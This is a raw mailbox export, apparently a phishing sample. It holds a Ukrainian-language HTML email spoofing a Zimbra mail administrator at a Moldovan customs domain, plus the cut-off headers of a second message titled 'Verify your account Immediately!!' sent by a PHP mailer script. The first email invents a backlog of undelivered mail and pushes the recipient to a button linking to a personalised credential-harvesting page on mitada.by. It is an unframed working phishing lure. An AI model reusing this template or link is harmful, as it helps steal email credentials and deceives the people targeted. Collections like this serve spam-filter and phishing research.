From: monkey.org  <Zimbra@customs.gov.md>
To: jose@monkey.org
Subject: =?UTF-8?B?0J/QvtC/0LXRgNC10LTQttC10L3QvdGPOiDQutCy0L7RgtCwIA==?=jose@monkey.org =?UTF-8?B?0L/QtdGA0LXQstC40YnQtdC90LAhICjQv9C+0LLQvdC1INC30LHQtdGA0ZbQs9Cw0L3QvdGPKQ==?=
Date: 19 Dec 2019 17:40:22 -0800
Message-ID: <20191219174022.5DE8810E19EFE880@customs.gov.md>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.10570.1001"></HEAD>
<body style=3D"MARGIN: 0.5em">
<DIV style=3D"FONT-SIZE: 12px; ZOOM: 1; COLOR: rgb(51,51,51); PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0p=
x">
<DIV style=3D"ZOOM: 1; PADDING-BOTTOM: 0px; PADDING-TOP: 12px; PADDING-LEFT=
: 0px; MARGIN: 0px; PADDING-RIGHT: 0px">
<DIV style=3D"ZOOM: 1; PADDING-BOTTOM: 10px; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px 14px; PADDING-RIGHT: 0px">
<DIV style=3D"FONT-SIZE: 14px; OVERFLOW: auto; ZOOM: 1; PADDING-BOTTOM: 8px=
; PADDING-TOP: 8px; PADDING-LEFT: 10px; MIN-HEIGHT: 220px; MARGIN: 0px; LIN=
E-HEIGHT: 1.66; PADDING-RIGHT: 10px">
<table style=3D"FONT-SIZE: 15px; FONT-FAMILY: Arial,Tahoma,Verdana,sans-ser=
if; WIDTH: 510pt; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: n=
one; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; LETTER-SPACIN=
G: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-varia=
nt-ligatures: normal; font-variant-caps: normal; text-decoration-style: ini=
tial; text-decoration-color: initial" cellspacing=3D"0" cellpadding=3D"0" w=
idth=3D"680" border=3D"0">
<TBODY>
<TR>
<td style=3D"FONT-FAMILY: arial,sans-serif; BORDER-TOP-COLOR: rgb(212,208,2=
00); BORDER-LEFT-COLOR: rgb(212,208,200); PADDING-BOTTOM: 0in; BORDER-BOTTO=
M-COLOR: rgb(212,208,200); PADDING-TOP: 8.35pt; PADDING-LEFT: 0in; MARGIN: =
0px; BORDER-RIGHT-COLOR: rgb(212,208,200); PADDING-RIGHT: 0in; BACKGROUND-C=
OLOR: transparent">
<P style=3D'FONT-SIZE: small; MARGIN-BOTTOM: 0px; FONT-FAMILY: "Helvetica N=
eue",Helvetica,Arial,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; MA=
RGIN-TOP: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0)=
; FONT-STYLE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255=
,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps:=
 normal; text-decoration-style: initial; text-decoration-color: initial'>&n=
bsp;&nbsp;</P>
<DIV style=3D'FONT-SIZE: small; FONT-FAMILY: "Helvetica Neue",Helvetica,Ari=
al,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT=
-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); FONT-STYLE: norma=
l; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT:=
 0px; font-variant-ligatures: normal; font-variant-caps: normal; text-decor=
ation-style: initial; text-decoration-color: initial'>
<table style=3D"FONT-SIZE: 15px; COLOR: rgb(33,33,33); LINE-HEIGHT: normal;=
 BACKGROUND-COLOR: rgb(243,243,243)" cellspacing=3D"0" cellpadding=3D"0" wi=
dth=3D"40%" bgcolor=3D"#f3f3f3" border=3D"0">
<TBODY>
<TR>
<td style=3D"FONT-FAMILY: arial,sans-serif; MARGIN: 0px" valign=3D"top" ali=
gn=3D"center">
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"486" bgcolor=3D"#ffffff=
" border=3D"0">
<TBODY>
<TR>
<td style=3D"FONT-FAMILY: arial,sans-serif; BORDER-BOTTOM: rgb(232,232,232)=
 1px solid; BORDER-LEFT: rgb(232,232,232) 1px solid; MARGIN: 0px" valign=3D=
"top">
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%" border=3D"0">
<TBODY>
<TR>
<td style=3D"FONT-FAMILY: arial,sans-serif; MARGIN: 0px; BACKGROUND-COLOR: =
rgb(0,82,142)" bgcolor=3D"#00528e" height=3D"32" valign=3D"middle" align=3D=
"center">&#1059; &#1074;&#1072;&#1089; &#1108; &#1085;&#1086;&#1074;&#1110;=
 &#1086;&#1095;&#1110;&#1082;&#1091;&#1074;&#1072;&#1085;&#1110; &#1087;&#1=
086;&#1074;&#1110;&#1076;&#1086;&#1084;&#1083;&#1077;&#1085;&#1085;&#1103;<=
BR></TD></TR>
<TR>
<td style=3D"FONT-FAMILY: arial,sans-serif; PADDING-TOP: 17px; PADDING-LEFT=
: 20px; MARGIN: 0px; PADDING-RIGHT: 20px" valign=3D"top">&#1055;&#1088;&#10=
80;&#1074;&#1110;&#1090; &#1090;&#1072;&#1084;&nbsp;<SPAN>&nbsp;</SPAN> <SP=
AN style=3D"FONT-SIZE: 12px; FONT-FAMILY: Roboto-Regular,Helvetica,Arial,sa=
ns-serif; COLOR: rgb(34,34,34); BACKGROUND-COLOR: rgb(250,250,250)"><FONT s=
tyle=3D"VERTICAL-ALIGN: inherit"><FONT style=3D"VERTICAL-ALIGN: inherit">&n=
bsp;</FONT></FONT></SPAN>
<U style=3D"FONT-SIZE: small; FONT-FAMILY: calibri; COLOR: rgb(0,0,255)"><A=
 style=3D"COLOR: rgb(6,73,119)" target=3D_blank><FONT style=3D"VERTICAL-ALI=
GN: inherit"><FONT style=3D"VERTICAL-ALIGN: inherit" size=3D4>jose</FONT></=
FONT></A></U>
<table style=3D"FONT-FAMILY: arial,sans-serif" cellspacing=3D"0" cellpaddin=
g=3D"0" width=3D"100%" border=3D"0">
<TBODY>
<TR>
<td style=3D"FONT-FAMILY: arial,sans-serif; PADDING-BOTTOM: 11px; MARGIN: 0=
px">
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><BR><BR><FONT style=3D"VER=
TICAL-ALIGN: inherit"><FONT style=3D"VERTICAL-ALIGN: inherit">
&#1055;&#1086;&#1087;&#1077;&#1088;&#1077;&#1076;&#1078;&#1077;&#1085;&#108=
5;&#1103; &#1059; &#1074;&#1072;&#1089; &#1108; 5 &#1085;&#1077;&#1087;&#10=
88;&#1086;&#1095;&#1080;&#1090;&#1072;&#1085;&#1080;&#1093; &#1083;&#1080;&=
#1089;&#1090;&#1110;&#1074;, &#1097;&#1086; &#1086;&#1095;&#1110;&#1082;&#1=
091;&#1102;&#1090;&#1100; &#1085;&#1072; &#1088;&#1086;&#1079;&#1075;&#1083=
;&#1103;&#1076;.&#1042;&#1072;&#1096; &#1077;&#1083;&#1077;&#1082;&#1090;&#=
1088;&#1086;&#1085;&#1085;&#1080;&#1081;=20
&#1083;&#1080;&#1089;&#1090; &#1087;&#1086;&#1074;&#1080;&#1085;&#1077;&#10=
85; &#1073;&#1091;&#1090;&#1080; &#1087;&#1110;&#1076;&#1090;&#1074;&#1077;=
&#1088;&#1076;&#1078;&#1077;&#1085;&#1080;&#1081;, &#1097;&#1086;&#1073; &#=
1086;&#1090;&#1088;&#1080;&#1084;&#1091;&#1074;&#1072;&#1090;&#1080; &#1085=
;&#1077;&#1087;&#1088;&#1086;&#1095;&#1080;&#1090;&#1072;&#1085;&#1110; &#1=
086;&#1095;&#1110;&#1082;&#1091;&#1074;&#1072;&#1085;&#1110;=20
&#1077;&#1083;&#1077;&#1082;&#1090;&#1088;&#1086;&#1085;&#1085;&#1110; &#10=
83;&#1080;&#1089;&#1090;&#1080;<FONT color=3D#333333 face=3DArial><SPAN sty=
le=3D"FONT-SIZE: 12px">.</SPAN></FONT></FONT></FONT></P>
<P style=3D"FONT-SIZE: 12px; MARGIN-BOTTOM: 0px; FONT-FAMILY: Arial; MARGIN=
-TOP: 0px; COLOR: rgb(51,51,51)">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px">
&#1065;&#1086;&#1073; &#1086;&#1090;&#1088;&#1080;&#1084;&#1091;&#1074;&#10=
72;&#1090;&#1080; &#1077;&#1083;&#1077;&#1082;&#1090;&#1088;&#1086;&#1085;&=
#1085;&#1110; &#1083;&#1080;&#1089;&#1090;&#1080; &#1090;&#1072; &#1086;&#1=
085;&#1086;&#1074;&#1083;&#1077;&#1085;&#1085;&#1103;, &#1073;&#1091;&#1076=
;&#1100; &#1083;&#1072;&#1089;&#1082;&#1072;, &#1089;&#1083;&#1110;&#1076;&=
#1082;&#1091;&#1081;&#1090;&#1077; &#1079;&#1072;=20
&#1086;&#1085;&#1086;&#1074;&#1083;&#1077;&#1085;&#1085;&#1103;&#1084;&#108=
0; &#1085;&#1080;&#1078;&#1095;&#1077;<BR><FONT color=3D#333333 face=3DAria=
l><SPAN style=3D"FONT-SIZE: 12px">&nbsp;</SPAN></FONT></P>
<table id=3D"m_-4252072650670897533m_-4864552766255304844m_6217081675348922=
213m_3071630621315126071m_568149801209756538m_-6302882783553759785gmail-m_9=
135723155707090125gmail-m_-995238720034544909m_-8871346052031639035m_-47609=
04499200881264m_4311794373684965744gmail-m_-7420144091889259069gmail-x_m_-8=
810563569346861798gmail-x_ydpfefd16a1yiv5294311236m_-4691901054814179017gma=
il-x_x_yiv7122546869yui_3_16_0_ym19_1_1485725186065_68317_mailru_css_attrib=
ute_postfix" style=3D"FONT-SIZE: 12px; FONT-FAMILY:=20
Arial; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING=
-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px" cellspacing=3D"0" border=3D"0"=
>
<TBODY id=3Dm_-4252072650670897533m_-4864552766255304844m_62170816753489222=
13m_3071630621315126071m_568149801209756538m_-6302882783553759785gmail-m_91=
35723155707090125gmail-m_-995238720034544909m_-8871346052031639035m_-476090=
4499200881264m_4311794373684965744gmail-m_-7420144091889259069gmail-x_m_-88=
10563569346861798gmail-x_ydpfefd16a1yiv5294311236m_-4691901054814179017gmai=
l-x_x_yiv7122546869yui_3_16_0_ym19_1_1485725186065_68318_mailru_css_attribu=
te_postfix style=3D"WIDTH: 169px">
<TR id=3Dm_-4252072650670897533m_-4864552766255304844m_6217081675348922213m=
_3071630621315126071m_568149801209756538m_-6302882783553759785gmail-m_91357=
23155707090125gmail-m_-995238720034544909m_-8871346052031639035m_-476090449=
9200881264m_4311794373684965744gmail-m_-7420144091889259069gmail-x_m_-88105=
63569346861798gmail-x_ydpfefd16a1yiv5294311236m_-4691901054814179017gmail-x=
_x_yiv7122546869yui_3_16_0_ym19_1_1485725186065_68319_mailru_css_attribute_=
postfix>
<td id=3D"m_-4252072650670897533m_-4864552766255304844m_6217081675348922213=
m_3071630621315126071m_568149801209756538m_-6302882783553759785gmail-m_9135=
723155707090125gmail-m_-995238720034544909m_-8871346052031639035m_-47609044=
99200881264m_4311794373684965744gmail-m_-7420144091889259069gmail-x_m_-8810=
563569346861798gmail-x_ydpfefd16a1yiv5294311236m_-4691901054814179017gmail-=
x_x_yiv7122546869yui_3_16_0_ym19_1_1485725186065_68320_mailru_css_attribute=
_postfix" style=3D"FONT-FAMILY: arial,sans-serif;=20
MIN-WIDTH: 50px; PADDING-BOTTOM: 5px; PADDING-TOP: 5px; PADDING-LEFT: 20px;=
 MARGIN: 0px; PADDING-RIGHT: 20px; BACKGROUND-COLOR: rgb(38,114,236)" bgcol=
or=3D"#2672ec"><FONT style=3D"FONT-FAMILY: Calibri,serif,EmojiFont">
<A id=3Dm_-4252072650670897533m_-4864552766255304844m_6217081675348922213m_=
3071630621315126071m_568149801209756538m_-6302882783553759785gmail-m_913572=
3155707090125gmail-m_-995238720034544909m_-8871346052031639035m_-4760904499=
200881264m_4311794373684965744gmail-m_-7420144091889259069gmail-x_m_-881056=
3569346861798gmail-LPNoLP_mailru_css_attribute_postfix style=3D"FONT-WEIGHT=
: 600; COLOR: rgb(255,255,255); PADDING-BOTTOM: 0px; TEXT-ALIGN: center; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px;=20
LETTER-SPACING: 0.02em; PADDING-RIGHT: 0px" href=3D"http://mitada.by/images=
/ru/RU/RU/index.php?email=3Djose@monkey.org" rel=3D"noopener noreferrer" ta=
rget=3D_blank data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttp:/=
/Ru.bayou.by/RU/RU/index.php?email%3D%5B%5B-Email-%5D%5D&amp;source=3Dgmail=
&amp;ust=3D1576843215339000&amp;usg=3DAFQjCNFjl8wTtPhJcyOVkdzakSfFIWii5g"><=
FONT style=3D"VERTICAL-ALIGN: inherit"><FONT style=3D"VERTICAL-ALIGN: inher=
it">
&#1054;&#1085;&#1086;&#1074;&#1110;&#1090;&#1100; &#1077;&#1083;&#1077;&#10=
82;&#1090;&#1088;&#1086;&#1085;&#1085;&#1091; &#1087;&#1086;&#1096;&#1090;&=
#1091; &#1079;&#1072;&#1088;&#1072;&#1079;</FONT></FONT></A></FONT></TD></T=
R></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD>=
</TR></TBODY></TABLE></TD></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TA=
BLE></DIV></DIV></DIV></DIV>
<DIV style=3D"FONT-SIZE: 12px; ZOOM: 1; COLOR: rgb(51,51,51); PADDING-BOTTO=
M: 0px; PADDING-TOP: 10px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0=
px">
<DIV style=3D"OVERFLOW: auto; ZOOM: 1; PADDING-BOTTOM: 0px; PADDING-TOP: 0p=
x; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rg=
b(248,247,247)">
<DIV style=3D"ZOOM: 1; PADDING-BOTTOM: 6px; PADDING-TOP: 12px; PADDING-LEFT=
: 17px; MARGIN: 0px; PADDING-RIGHT: 17px">
<DIV style=3D"BORDER-TOP: rgb(204,204,204) 1px solid; BORDER-RIGHT: rgb(204=
,204,204) 1px solid; BORDER-BOTTOM: rgb(204,204,204) 1px solid; ZOOM: 1; PA=
DDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: rgb(20=
4,204,204) 1px solid; MARGIN: 0px 0px 5px; PADDING-RIGHT: 0px; BACKGROUND-C=
OLOR: rgb(255,255,255)">
<FORM style=3D"BORDER-LEFT-WIDTH: 0px; LIST-STYLE-TYPE: none; BORDER-RIGHT-=
WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px=
; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px=
" method=3Dpost=20
name=3Dm_6008557627891618780_m_-5065826456754848551_m_-3019938895932832707_=
m_-1136134690341326834_m_6062377593164862955_m_-7754924915834969284_m_42094=
31162844320233_m_3536419167715739438_m_-5847819176890748448_m_-632847467875=
8511755_m_-5031002461375716288_m_3899842499305726776_m_6620857945808938312_=
m_-7367747133483322227_m_-245186353383065629_m_-3942941594544785110_m_-4118=
862635892354228_m_6709434288079980599_m_3600970178461999168_m_1771393584629=
905793_m_5018678999496672307_m_3038609729784904358_m
 action=3Dhttps://m0.mail.sina.com.cn/classic/index.php?ssl=3D1# target=3D_=
blank _649230890471100508_m_-6397853574776364816_m_-1631741230880678705_m_-=
3383837086719932074_m_-5851729106092773322_m_-8079785220653996704_m_-203648=
3665336595418_m_-6271790875407274883_m_-8038529207385719154_m_-207844825819=
8719595_frm_reader_quick_reply>
<DIV style=3D"ZOOM: 1; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT:=
 0px; MARGIN: 0px; PADDING-RIGHT: 0px"><INPUT style=3D"BORDER-LEFT-WIDTH: 0=
px; FONT-SIZE: 14px; HEIGHT: 26px; FONT-FAMILY: inherit; BORDER-RIGHT-WIDTH=
: 0px; WIDTH: 1094px; VERTICAL-ALIGN: -2px; BORDER-BOTTOM-WIDTH: 0px; COLOR=
: rgb(155,155,155); OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP=
: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 10px; LINE-HEIGHT: 26px; BORDER-T=
OP-WIDTH: 0px; font-stretch: inherit"></DIV></FORM>
</DIV></DIV></DIV></DIV></BODY></HTML>

From jose@monkey.org Sun Dec 22 22:01:23 2019 +0000
Return-Path: www-data@wacom.ae
Delivered-To: jose@monkey.org
X-FDA: 76294149246.39.debt76_c1d9a26fb91d
X-Spam-Summary: 30,2,0,9da120fbb5050b8f,d41d8cd98f00b204,www-data@wacom.ae,:,RULES_HIT:41:72:355:375:379:474:967:969:973:978:983:988:989:1208:1224:1260:1263:1313:1314:1345:1381:1431:1432:1433:1434:1437:1516:1517:1534:1542:1568:1570:1571:1699:1711:1714:1730:1747:1777:1792:1803:2198:2199:2393:2525:2527:2565:2610:2612:2682:2685:2693:2859:2890:2895:2901:2902:2913:2915:2916:2919:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3392:3865:3867:3868:3870:3871:3873:3902:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:3976:4042:4321:4605:5007:6096:6261:6650:6669:6671:6678:6688:8568:8603:8885:8957:9025:9059:9080:9388:9411:9416:9908:10004:10049:10346:10400:11658:11914:12043:12295:12297:12438:12555:12698:12737:12891:12903:12956:12958:12959:12961:12967:12968:12986:13007:13139:13141:13153:13228:13230:13618:14093:14129:14181:14721:14750:14828:14849:21067:21080:21325:21347:21450:21451:21554:21627:21657:21797:21939:21972:30001:30054:30064:30069
X-HE-Tag: debt76_c1d9a26fb91d
X-Filterd-Recvd-Size: 3267
Received: from wacom.ae (wacom.ae [159.203.69.13])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 22 Dec 2019 22:01:23 +0000 (UTC)
Received: by wacom.ae (Postfix, from userid 33)
	id 0595A1AFAEB; Sun, 22 Dec 2019 17:02:19 -0500 (EST)
To: jose@monkey.org
Subject: Verify your account Immediately!!
X-PHP-Originating-Script: 33:MatrixInboxV16.php
